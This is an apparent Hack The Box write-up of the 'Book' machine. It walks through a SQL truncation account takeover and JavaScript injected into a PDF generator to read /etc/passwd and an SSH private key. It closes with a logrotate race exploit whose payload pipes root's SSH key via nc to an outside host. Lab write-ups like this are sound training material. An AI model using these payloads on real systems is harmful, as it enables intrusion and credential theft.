HTB Writeup: Book
I don’t like reading that much
Enumeration
Hostname : book.htb
-
nmap
# Nmap 7.92 scan initiated Tue Jun 21 06:08:40 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports.txt -p- -iL ip.txt Nmap scan report for 10.129.95.163 (10.129.95.163) Host is up (0.075s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA) | 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA) |_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: LIBRARY - Read | Learn | Have Fun |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 21 06:09:18 2022 -- 1 IP address (1 host up) scanned in 38.12 seconds
-
Web Server
A web server on TCP/80 is detected. Visiting the website
http://10.129.95.163
Foothold
-
On performing basic testing, the login/signup form is found vulnerable to username enumeration and SQL Truncation vulnerability.
Source: https://book.hacktricks.xyz/pentesting-web/sql-injection#sql-truncation-attack
Testing for SQL Truncation
-
An account was created with credentials:
[email protected]:Passw0rd!
-
A second account was created, with credentials:
[email protected] malicious:Password!123
Since there are checks implemented on the front-end to check for a valid email, a MITM Proxy (BurpSuite) can be used to intercept and modify the request. -
Going back to login page, when the username of first account and password of second accounts were used, it resulted in account access of first account.
[email protected]:Password!123
Exploitation
-
To exploit the flaw, a valid account/username is required. The web application is also vulnerable to username enumeration. On trying to signup with
[email protected]
an alert is displayed saying “User Exits!” -
A new account with credentials
[email protected] malicious:Password
-
When logging in with the credentials
[email protected]:Password
, we are logged in asadmin
File upload functionality and Admin Panel (Server side XSS to LFI)
-
A file upload functionality was found under the tab
Collections
(http://book.htb/collections.php
) -
An admin panel was found at
http://book.htb/admin
-
Collections tab on admin panel has a server side PDF generation utility, which parsed the Title, Author and Link of books from database.
-
To check for HTML injection, the form was submitted with
<b>should be bold</b>
as book title, and the contents were checked via admin panel.
Exploitation
-
It is found that the PDF generator is vulnerable to HTML content injection. To escalate further, JavaScript injection can be checked. The title
<script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///etc/passwd');x.send();</script>
should print the contents of file/etc/passwd
from remote server. -
We find a user on the remote machine,
reader
. Using the same payload, and different file, we try extracting private SSH keys forreader
if they exist.<script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
The immediate problem is, the key is overflowing from the printable area. For that, we need to add additional javascript to reduce the font size. The
document.style.fontSize = "x-small"
can probably help to extract the complete key.<p id='ad'></p><script>var x = new XMLHttpRequest();x.onload=function(){document.getElementById('ad').style.fontSize="x-small";document.getElementById('ad').innerHTML = x.responseText;};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
-
The key is saved in a file, permissions of the file are modified to
0600
to make it useable as SSH Key. -
Connecting via SSH to
[email protected]
withid_rsa
as private key, we have a valid SSH Session on the remote target as userreader
-
Privilege Escalation
Enumeration
-
Downloading and launching
[linpeas.sh](http://linpeas.sh)
gave a couple of information:- A CRON Job is being executed by
root
which useslogrotate
and configuration/root/log.cfg
- The web server directory is
/var/www/html
, which containeddb.php
, having credentials for MySQL database.book_admin:I_Hate_Book_Reading
- From MySQL database, credentials for
[email protected]
were retrieved:[email protected]:Sup3r_S3cur3_P455
- A CRON Job is being executed by
-
The credentials are not useful as they don’t work in any ways.
-
The
logrotate
functionality present here if found to be vulnerable to a race condition. We have write access on the log files in the folder/home/reader/backups/
Source: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
Exploitation
-
Using the
[logrotten](https://github.com/whotwagner/logrotten)
exploit, we try to inject our payload of reverse shell to escalate our privileges toroot
.# This will require two seperate SSH Sessions # One to compile and execute logrotten exploit # Second to make changes to /home/reader/backups/access.log to trigger logrotate required for exploitation # Session 1 gcc -o exploit logrotten.c echo 'cat /root/.ssh/id_rsa | /bin/nc 10.10.14.2 9090' > payloadfile ./exploit -p ./payloadfile /home/reader/backups/access.log # Session 2 cat payloadfile > /home/reader/backups/access.log
Privilege Escalation was achieved and the remote host has been completely pwned/owned.